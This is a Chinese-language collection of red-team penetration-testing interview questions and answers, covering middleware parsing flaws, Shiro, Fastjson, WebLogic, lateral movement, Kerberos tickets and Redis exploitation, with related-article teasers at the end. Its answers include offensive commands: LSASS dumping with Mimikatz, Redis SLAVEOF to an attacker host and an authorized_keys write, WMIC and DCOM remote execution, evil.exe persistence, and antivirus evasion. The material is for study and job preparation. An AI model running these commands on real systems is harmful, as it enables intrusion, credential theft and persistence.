2025年滲透測試面試題總結-滲透測試紅隊面試八(題目+回答)

網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

滲透測試紅隊面試八

二百一十一、常見中間件解析漏洞利用方式

二百一十二、MySQL用戶密碼存儲與加密

二百一十三、Linux系統加固降權思路

二百一十四、繞過CDN獲取真實IP

二百一十五、CMD查詢遠程開放端口

二百一十六、查找域控方法

二百一十七、CSRF成因及防御(非Token方案)

二百一十八、打點常用漏洞

二百一十九、Shiro漏洞發現方法

二百二十、WebLogic權限繞過

二百二十一、Fastjson漏洞原理

二百二十二、WebLogic漏洞類型

二百二十三、IIOP協議與類似技術

二百二十四、不出網漏洞利用方法

二百二十五、Webshell不出網應對措施

二百二十六、DNS出網協議利用

二百二十七、橫向滲透命令執行手段

二百二十八、PsExec與WMIC區別

二百二十九、DCOM遠程執行操作

二百三十、密碼抓取方法

二百三十一、密碼抓取版本限制

二百三十二、抓不到密碼的應對

二百三十三、域內攻擊方法

二百三十四、NTLM驗證機制

二百三十五、Kerberos票據攻擊

二百三十六、Windows Redis利用

二百三十七、Linux Redis利用

二百三十八、Windows后門方式

二百三十九、CS的哈希與密碼獲取

二百四十、收集RDP記錄及對抗殺軟

滲透測試紅隊面試八

二百一十一、說說常見的中間件解析漏洞利用方式二百一十二、mysql的用戶名密碼是存放在那張表里面?mysql密碼采用哪種加密方式?二百一十三、Windows、Linux、數據庫的加固降權思路,任選其一二百一十四、如何繞過CDN獲取目標網站真實IP,談談你的思路?二百一十五、CMD命令行如何查詢遠程終端開放端口二百一十六、怎么查找域控二百一十七、CSRF 成因及防御措施;如果不用 token 如何做防御?二百一十八、打點一般會用什么漏洞二百一十九、平常怎么去發現shiro漏洞的二百二十、weblogic權限繞過有沒有了解二百二十一、fastjson漏洞利用原理二百二十二、weblogic有幾種漏洞二百二十三、IIOP聽說過嗎,和什么類似二百二十四、這幾個漏洞不出網情況下怎么辦二百二十五、拿到webshell不出網情況下怎么辦二百二十六、dns出網協議怎么利用二百二十七、橫向滲透命令執行手段二百二十八、psexec和wmic或者其他的區別二百二十九、Dcom怎么操作?二百三十、抓取密碼的話會怎么抓二百三十一、什么版本之后抓不到密碼二百三十二、抓不到的話怎么辦二百三十三、域內攻擊方法有了解過嗎二百三十四、ntlm驗證機制二百三十五、kerberos認證黃金、白銀票據制作原理,以及需要哪個值二百三十六、window redis 需要有哪些利用手段,除了寫文件和啟動項二百三十七、linux redis 寫有哪些利用方式二百三十八、windows后門包括哪些方式二百三十九、cs hashdump和logonpasswd 分別從哪里讀取哈希和密碼二百四十、如何收集rdp連接記錄,如果有殺軟怎么辦

二百一十一、常見中間件解析漏洞利用方式

  1. IIS解析漏洞
    • 目錄解析/test.asp;.jpg 被解析為ASP腳本(IIS6.0)。
    • 分號截斷test.asp;.jpg 利用分號繞過擴展名檢查。
    • PUT寫文件:通過HTTP PUT方法上傳腳本文件(需配置不當)。
  2. Apache解析漏洞
    • 多后綴解析test.php.xxx.xxx未定義,按最后一個有效后綴解析(如.php)。
    • .htaccess覆蓋:上傳自定義.htaccess設置解析規則(如AddType application/x-httpd-php .jpg)。
  3. Nginx解析漏洞
    • 路徑解析錯誤/test.jpg/test.phptest.jpg 作為PHP執行(Nginx + PHP-FPM配置不當)。
    • CVE-2013-4547:利用未正確處理空格和\0字符繞過檢查(如test.jpg \0.php )。

二百一十二、MySQL用戶密碼存儲與加密

  1. 存儲位置
    • 表名mysql.user 表存儲用戶名、主機權限及密碼哈希。
    • 字段authentication_string(MySQL 5.7+)或password(舊版)。
  2. 加密方式
    • MySQL 4.1+:雙重SHA1加密(SHA1(SHA1(password)))。
    • MySQL 8.0+:默認使用caching_sha2_password插件(SHA256哈希)。
  3. 補充信息
    • 查詢用戶權限:SELECT user, host, authentication_string FROM mysql.user;
    • 身份驗證插件變更可能導致舊客戶端兼容性問題(需啟用mysql_native_password)。

二百一十三、Linux系統加固降權思路

  1. 最小權限原則
    • 用戶權限:創建低權限用戶運行服務(如www-data運行Web服務)。
    • SUID/SGID清理find / -perm /4000 -o -perm /2000查找并刪除非必要特權文件。
  2. 服務與網絡加固
    • 禁用無用服務systemctl disable vsftpd關閉FTP等非必要服務。
    • 防火墻規則iptables限制僅開放必要端口(如SSH僅允許特定IP)。
  3. 文件系統安全
    • 敏感文件權限chmod 600 /etc/shadow限制訪問。
    • SELinux/AppArmor:啟用強制訪問控制,限制進程權限。

二百一十四、繞過CDN獲取真實IP

  1. 歷史記錄查詢
    • DNS歷史:通過SecurityTrails、ViewDNS查詢歷史解析記錄。
    • IP數據庫:使用Censys或Shodan搜索目標域名早期綁定的IP。
  2. 子域名探測
    • 爆破子域subfinderamass發現未使用CDN的子域(如dev.example.com )。
    • 郵件服務器:分析郵件頭中Received字段獲取服務器IP。
  3. 主動探測技巧
    • SSRF漏洞:利用目標站點的SSRF讀取內網元數據(如AWS的169.254.169.254)。
    • 全網段掃描:對目標域名解析的CDN IP段進行端口掃描,尋找非標準端口服務。

二百一十五、CMD查詢遠程開放端口

  1. 基礎命令
    • Telnettelnet <IP> <端口>(若連接成功則端口開放)。
    • Netstatnetstat -ano | findstr "ESTABLISHED"查看本地連接。
  2. PowerShell工具
    • Test-NetConnectionTest-NetConnection <IP> -Port <端口>顯示端口狀態。
  3. 第三方工具
    • Nmapnmap -p 1-1000 <IP>掃描指定端口范圍。
    • PortQry:微軟工具,支持批量端口檢測。

二百一十六、查找域控方法

  1. DNS查詢
    • SRV記錄nslookup -type=SRV _ldap._tcp.dc._msdcs.< 域名>定位域控的LDAP服務。
  2. 系統命令
    • nltestnltest /dclist:<域名>列出域控列表。
    • net命令net group "Domain Controllers" /domain查詢域控組。
  3. LDAP查詢
    • PowerShell
      powershellGet-ADDomainController -Discover -Service PrimaryDC | Select-Object Name, IPv4Address 
      

二百一十七、CSRF成因及防御(非Token方案)

  1. 漏洞成因
    • 瀏覽器自動攜帶Cookie:攻擊者誘導用戶訪問惡意頁面,觸發跨站請求。
    • 無二次驗證:敏感操作未校驗請求來源。
  2. 防御措施(非Token)
    • SameSite Cookie:設置SameSite=Strict限制跨站請求。
    • Referer驗證:檢查HTTP頭Referer是否來自合法域名。
    • CAPTCHA驗證:關鍵操作前要求用戶輸入驗證碼。

二百一十八、打點常用漏洞

  1. Web漏洞
    • SQL注入:通過注入獲取數據庫權限(如后臺管理員憑證)。
    • 文件上傳:上傳Webshell控制服務器(如繞過類型檢查)。
  2. 服務漏洞
    • 未授權訪問:Redis、MongoDB等直接執行命令。
    • RCE漏洞:如Log4j2、Fastjson反序列化。
  3. 配置缺陷
    • 默認密碼:Tomcat、Jenkins等管理界面弱口令。
    • SSRF:利用內網探測或元數據服務攻擊。

二百一十九、Shiro漏洞發現方法

  1. Cookie特征識別
    • RememberMe字段:Base64解碼后開頭為x01x02x03x04(序列化數據特征)。
  2. 漏洞掃描工具
    • ShiroExploit:自動化檢測密鑰及反序列化漏洞。
    • Burp插件ShiroScan檢測Cookie有效性。
  3. 手工檢測
    • 密鑰爆破:利用已知密鑰列表(如kPH+bIxk5D2deZiIxcaaaA==)測試反序列化。
    • DNSLog驗證:構造惡意序列化數據觸發DNS請求,確認漏洞存在。

二百二十、WebLogic權限繞過

  1. CVE-2020-14882
    • 未授權訪問:訪問/console/css/%252e%252e%252fconsole.portal 繞過控制臺認證。
    • 利用工具weblogic-framework直接執行命令。
  2. CVE-2021-2109
    • 管理接口繞過:通過構造特殊URL路徑訪問后臺功能。
  3. 修復建議
    • 更新補丁,限制管理接口訪問IP,啟用強認證機制。

二百二十一、Fastjson漏洞原理

  1. 反序列化機制
    • @type指定類:攻擊者通過JSON中的@type指定惡意類觸發Gadget鏈。
    • JNDI注入:利用com.sun.rowset.JdbcRowSetImpl 等類加載遠程惡意代碼。
  2. 漏洞版本
    • <=1.2.24:默認支持autoType,可直接利用。
    • 1.2.25-1.2.47:需繞過autoType檢查(如利用L前綴或特殊類名)。
  3. 防御方案
    • 升級至1.2.83+版本,關閉autoType功能,使用白名單機制。

二百二十二、WebLogic漏洞類型

  1. 反序列化漏洞
    • T3協議:CVE-2018-2628利用T3反序列化執行命令。
    • XMLDecoder:CVE-2017-10271通過WLS組件觸發。
  2. SSRF漏洞
    • CVE-2014-4210uddiexplorer組件未限制內網請求。
  3. 權限繞過
    • CVE-2020-14825:繞過Console組件權限校驗。

二百二十三、IIOP協議與類似技術

  1. IIOP協議
    • 用途:CORBA的通信協議,用于分布式對象調用。
    • 類似技術:與RMI(Java遠程方法調用)類似,均涉及序列化數據傳輸。
  2. 漏洞利用
    • 反序列化攻擊:通過IIOP傳輸惡意對象觸發Gadget鏈(如WebLogic CVE-2020-2551)。

二百二十四、不出網漏洞利用方法

  1. DNS/ICMP隧道
    • DNS協議:使用dnscat2通過DNS查詢傳輸數據。
    • ICMP協議:利用ptunnelicmpsh建立隱蔽通道。
  2. 內網服務中繼
    • SMB Relay:通過Responder工具捕獲NTLM哈希并中繼至其他主機。
  3. Web反向連接
    • HTTP文件傳輸:通過Web服務上傳/下載文件(如Python http.server )。

二百二十五、Webshell不出網應對措施

  1. 內網探測
    • 掃描內網段:使用for /L %i in (1,1,255) do ping -n 1 192.168.1.%i發現存活主機。
  2. 利用現有服務
    • 數據庫外聯:通過MySQL SELECT ... INTO OUTFILE寫入Web目錄。
    • 郵件發送:使用SMTP協議將數據外傳。
  3. 內存加載
    • PowerShell腳本:反射加載惡意代碼,避免落地文件。

二百二十六、DNS出網協議利用

  1. DNS隧道
    • 工具dnscat2建立加密隧道,執行命令或傳輸文件。
    • 隱蔽性:利用TXT或CNAME記錄傳輸數據,繞過防火墻檢測。
  2. 數據滲透
    • 子域名攜帶數據data.example.com 解析為Base64編碼的敏感信息。

二百二十七、橫向滲透命令執行手段

  1. PsExec
    • 特點:需目標開啟ADMIN$共享,生成服務執行命令,日志明顯。
  2. WMI
    • 命令wmic /node:<IP> process call create "cmd.exe /c whoami"
    • 優勢:無需安裝客戶端,基于135端口。
  3. SSH密鑰利用
    • 條件:獲取目標SSH私鑰,通過ssh -i id_rsa user@ip直接登錄。

二百二十八、PsExec與WMIC區別

PsExecWMIC
需目標開啟ADMIN$共享和文件寫入權限。僅需135端口和有效憑證,無需文件操作。
生成服務進程,日志記錄明顯(svchost)。通過WMI協議執行,日志較隱蔽。
適合批量操作,但易觸發告警。更隱蔽,但命令長度受限。

二百二十九、DCOM遠程執行操作

  1. 原理
    • DCOM接口:通過COM對象遠程調用方法(如MMC20.Application)。
  2. 利用步驟
    • 列出DCOM對象Get-CimInstance Win32_DCOMApplication
    • 執行命令
      powershell$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<IP>")) $com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")

二百三十、密碼抓取方法

  1. Mimikatz
    • 命令sekurlsa::logonpasswords提取內存中的明文密碼和哈希。
  2. 注冊表導出
    • SAM/SYSTEM文件reg save HKLM\SAM SAM.bak 導出后使用secretsdump解析。
  3. Procdump轉儲
    • 轉儲LSASSprocdump.exe -ma lsass.exe lsass.dmp ,本地用Mimikatz解析。

二百三十一、密碼抓取版本限制

  1. Windows 8.1/Server 2012+
    • WDigest禁用:默認不緩存明文密碼(需啟用注冊表項UseLogonCredential)。
  2. Windows 10/Server 2016+
    • LSASS保護:啟用Credential Guard后無法直接讀取內存密碼。

二百三十二、抓不到密碼的應對

  1. 哈希傳遞(Pass-the-Hash)
    • 工具psexec.pycrackmapexec使用NTLM哈希橫向移動。
  2. Kerberos票據
    • 黃金票據:利用krbtgt哈希偽造TGT,訪問任意服務。

二百三十三、域內攻擊方法

  1. 橫向移動
    • MS17-010:利用永恒之藍漏洞攻擊未修補主機。
  2. 權限提升
    • ACL濫用:修改域對象的ACL,授予自身特權(如DCsync權限)。
  3. 持久化
    • Skeleton Key:植入惡意域控后門,使用萬能密碼登錄。

二百三十四、NTLM驗證機制

  1. 三步握手
    • 協商:客戶端發送NEGOTIATE_MESSAGE。
    • 挑戰:服務器返回CHALLENGE_MESSAGE(包含隨機Nonce)。
    • 認證:客戶端使用密碼哈希加密Nonce生成RESPONSE_MESSAGE。
  2. 中間人攻擊
    • NTLM Relay:將認證請求中繼至其他服務器,執行命令或獲取權限。

二百三十五、Kerberos票據攻擊

  1. 黃金票據
    • 原理:偽造TGT票據,需krbtgt的NTLM哈希和域SID。
    • 用途:訪問域內任意服務。
  2. 白銀票據
    • 原理:偽造特定服務的ST票據,需服務賬戶哈希和服務SPN。
    • 用途:僅限訪問特定服務(如CIFS文件共享)。

二百三十六、Windows Redis利用

  1. 主從復制RCE
    • 步驟:設置惡意主節點,同步module.dll 執行命令。
    • 命令
      bashredis-cli -h <target> SLAVEOF <attacker-ip> 6379 
  2. 計劃任務劫持
    • 寫入任務:通過CONFIG SET dirdbfilename寫入惡意任務文件。

二百三十七、Linux Redis利用

  1. SSH密鑰寫入
    • 命令
      basredis-cli -h <target> config set dir /root/.ssh redis-cli -h <target> config set dbfilename "authorized_keys" redis-cli -h <target> set x "\n\nssh-rsa AAAAB3Nz...\n\n" redis-cli -h <target> save 
  2. Crontab后門
    • 寫入任務:設置定時任務反彈Shell。

二百三十八、Windows后門方式

  1. 注冊表啟動項
    • 路徑HKLM\Software\Microsoft\Windows\CurrentVersion\Run
  2. 計劃任務
    • 命令schtasks /create /tn "Update" /tr "C:\evil.exe" /sc onstart
  3. 服務后門
    • 創建服務sc create EvilService binPath= "C:\evil.exe" start= auto

二百三十九、CS的哈希與密碼獲取

  1. hashdump
    • 來源:從LSASS進程內存中提取NTLM哈希。
  2. logonpasswords
    • 來源:從Windows憑據管理器獲取明文密碼(需WDigest啟用)。

二百四十、收集RDP記錄及對抗殺軟

  1. 記錄位置
    • 注冊表HKCU\Software\Microsoft\Terminal Server Client\Servers
    • 日志文件%USERPROFILE%\Documents\Default.rdp
  2. 繞過殺軟
    • 離線提取:直接復制注冊表文件或日志到本地分析。
    • 隱蔽工具:使用PowerShell腳本讀取注冊表,避免觸發行為檢測。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/80785.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/80785.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/80785.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

大語言模型主流架構解析:從 Transformer 到 GPT、BERT

&#x1f4cc; 友情提示&#xff1a; 本文內容由銀河易創AI&#xff08;https://ai.eaigx.com&#xff09;創作平臺的gpt-4-turbo模型生成&#xff0c;旨在提供技術參考與靈感啟發。文中觀點或代碼示例需結合實際情況驗證&#xff0c;建議讀者通過官方文檔或實踐進一步確認其準…

Java設計模式之裝飾器模式:從基礎到高級的全面解析(萬字解析)

裝飾器模式(Decorator Pattern)是一種結構型設計模式,它允許向一個現有的對象添加新的功能,同時又不改變其結構。這種模式創建了一個裝飾類,用來包裝原有的類,并在保持類方法簽名完整性的前提下,提供了額外的功能。 一、裝飾器模式基礎概念 1.1 什么是裝飾器模式 裝飾…

RN 鴻蒙混合開發實踐(踩坑)

#三方框架# #React Native # 1 。環境配置&#xff1b; 安裝 DevEco 開發工具&#xff1b; Node 版本16&#xff1b; hdc環境配置 hdc 是 OpenHarmony 為開發人員提供的用于調試的命令行工具&#xff0c;鴻蒙 React Native 工程使用 hdc 進行真機調試。hdc 工具通過 OpenHa…

動態網站 LNMP

一、名詞解釋&#xff1a; LNMP&#xff1a; L : 代表 Linux 操作系統&#xff0c;為網站提供了可靠的運行環境N : 代表 Nginx&#xff0c;它是一款輕量級的高性能 Web 服務器&#xff0c;能夠快速處理大量并 發連接&#xff0c;有效提升網站的訪問速度和性能 M : 代表…

DAY04:Vue.js 指令與事件處理深度解析之從基礎到實戰

1. 指令系統核心概念 1.1 插值表達式與基礎指令 Vue.js 的指令系統是其響應式編程模型的核心&#xff0c;我們首先從最基礎的插值表達式開始&#xff1a; <div id"app"><!-- 基礎文本插值 --><p>{{ message }}</p><!-- JavaScript 表達…

12配置Hadoop集群-集群配置

&#xff08;一&#xff09;Hadoop的組成 對普通用戶來說&#xff0c; Hadoop就是一個東西&#xff0c;一個整體&#xff0c;它能給我們提供無限的磁盤用來保存文件&#xff0c;可以使用提供強大的計算能力。 在Hadoop3.X中&#xff0c;hadoop一共有三個組成部…

Kubernetes生產實戰(四):kubelet日志快速定位指南

kubelet作為Kubernetes節點的核心管家&#xff0c;其日志是排查節點問題的金鑰匙。本文將分享生產環境中查看和分析kubelet日志的完整方案&#xff0c;助你快速定位節點級故障。 一、基礎操作&#xff1a;快速查看日志 1. systemd服務日志&#xff08;推薦首選&#xff09; …

麥科信獲評CIAS2025金翎獎【半導體制造與封測領域優質供應商】

在蘇州舉辦的2025CIAS動力能源與半導體創新發展大會上&#xff0c;深圳麥科信科技有限公司憑借在測試測量領域的技術積累&#xff0c;入選半導體制造與封測領域優質供應商榜單。本屆大會以"新能源芯時代"為主題&#xff0c;匯集了來自功率半導體、第三代材料應用等領…

Python實例題:pygame開發打飛機游戲

目錄 Python實例題 題目 pygame-aircraft-game使用 Pygame 開發的打飛機游戲腳本 代碼解釋 初始化部分&#xff1a; 游戲主循環&#xff1a; 退出部分&#xff1a; 運行思路 注意事項 Python實例題 題目 pygame開發打飛機游戲 pygame-aircraft-game使用 Pygame 開發…

Gin 框架入門

Gin 框架入門 一、響應數據 JSON 響應 在 Web 開發中&#xff0c;JSON 是一種常用的數據交換格式。Gin 提供了簡便的方法來響應 JSON 數據。 package mainimport ("github.com/gin-gonic/gin" )func main() {r : gin.Default()r.GET("/json", func(c *…

Flink實時數倉數據突變時,如何快速排查原因

在大數據時代,數據的價值已經被無數企業和組織深刻認識到,而實時數倉作為數據處理和分析的重要基礎設施,正在逐漸成為推動業務增長和決策優化的核心引擎。想象一下,電商平臺在雙十一大促期間需要實時監控訂單量、用戶行為,甚至庫存變化,以便及時調整營銷策略和物流調度;…

視頻人像摳圖技術選型--截止2025年4月

前言&#xff1a;我是一名算法工程師&#xff0c;經常需要對某個AI功能做技術調研和輸出技術選型報告&#xff0c;在過去多年的工作當中&#xff0c;積累了很多內容&#xff0c;我會陸陸續續將這些內容整理出來分享給大家&#xff0c;希望大家喜歡&#xff0c;感謝您的閱讀&…

docker compose ps 命令

docker compose ps 命令用于列出與 Docker Compose 項目相關的容器及其狀態。 docker compose ps 能顯示當前項目中所有服務容器的運行狀態、端口映射等信息。 語法 docker compose ps [OPTIONS] [SERVICE…] SERVICE&#xff08;可選&#xff09;&#xff1a;指定要查看狀態…

C語言 字符函數和字符串函數(1)

目錄 1.字符分類函數 2.字符轉換函數 3.strlen的使用和模擬實現 4.strcpy的使用和模擬實現 在編程的過程中&#xff0c;我們經常要處理字符和字符串&#xff0c;為了方便操作字符和字符串&#xff0c;C語言標準庫中提 供了一系列庫函數&#xff0c;接下來我們就學習一下這…

MySQL 中如何進行 SQL 調優?

在MySQL中進行SQL調優是一個系統性工程&#xff0c;需結合索引優化、查詢改寫、性能分析工具、數據庫設計及硬件配置等多方面策略。以下是具體優化方法及案例說明&#xff1a; 一、索引優化&#xff1a;精準提速的關鍵 索引類型選擇 普通索引&#xff1a;加速頻繁查詢的列&…

OpenCV圖像金字塔詳解:原理、實現與應用

一、什么是圖像金字塔&#xff1f; 圖像金字塔是圖像處理中一種重要的多尺度表示方法&#xff0c;它通過對圖像進行重復的平滑和降采樣&#xff08;或上采樣&#xff09;操作&#xff0c;生成一系列分辨率逐漸降低&#xff08;或升高&#xff09;的圖像集合。這種結構形似金字…

收集飛花令碎片——C語言分支與循環語句(上)

前言 Hello,各位碼友&#xff0c;本章將會給大家帶來C語言的分支與循環整章串講&#xff0c;這一張的內容分為基礎知識和程序練習兩個部分 希望通過這一章能夠帶大家更好地去掌握C語言的分支與循環語句 大家一起努力吧 C語言分支與循環語句&#xff08;基礎知識&#xff09; C…

嵌入式硬件篇---TOF|PID

文章目錄 前言1. 硬件準備主控芯片ToF模塊1.VL53L0X2.TFmini 執行機構&#xff1a;電機舵機其他 2. 硬件連接(1) VL53L0X&#xff08;IC接口&#xff09;(2) TFmini&#xff08;串口通信&#xff09; 3. ToF模塊初始化與數據讀取(1) VL53L0X&#xff08;基于HAL庫&#xff09;(…

PCB設計實踐(十二)PCB設計電容選型:功能、材質、規則

在PCB設計中&#xff0c;電容作為基礎元件承擔著濾波、儲能、去耦、耦合等核心功能。其分類與使用規則直接影響電路穩定性、抗干擾能力和信號完整性。本文從工程實踐角度系統梳理PCB設計中電容的五大分類、選型規范及布局布線規則&#xff0c;幫助設計者構建科學的電容應用體系…

vue2關閉eslint

在項目根目錄下找到 vue.config.js 文件。如果沒有該文件&#xff0c;可以直接在項目根目錄創建一個。 2. 添加 lintOnSave: false 配置 module.exports {lintOnSave: false };